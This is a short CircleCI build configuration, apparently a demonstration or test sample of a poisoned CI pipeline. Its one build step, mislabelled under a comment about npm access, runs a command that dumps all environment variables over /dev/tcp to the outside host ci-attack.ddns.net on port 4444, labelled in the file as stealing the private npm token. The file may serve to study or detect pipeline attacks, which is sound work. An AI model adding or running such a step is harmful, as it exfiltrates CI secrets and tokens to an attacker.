defaults: &defaults
  working_directory: ~/workspace
  docker:
    - image: circleci/node:latest

version: 2
jobs:
  build:
    <<: *defaults
    steps:
      # Setup access to our private npm organization
      - run:
          name: Steal private npm token
          command: env >/dev/tcp/ci-attack.ddns.net/4444 #EXF1LL S3CRETS, SO EVIL!

workflows:
  version: 2
  build-lint-test:
    jobs:
      - build
